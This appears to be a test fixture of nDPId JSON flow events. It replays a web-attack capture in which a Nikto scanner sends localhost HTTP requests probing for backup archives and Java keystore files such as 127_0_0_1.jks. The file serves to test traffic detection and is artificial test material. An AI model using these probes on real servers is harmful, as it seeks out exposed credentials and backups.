+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 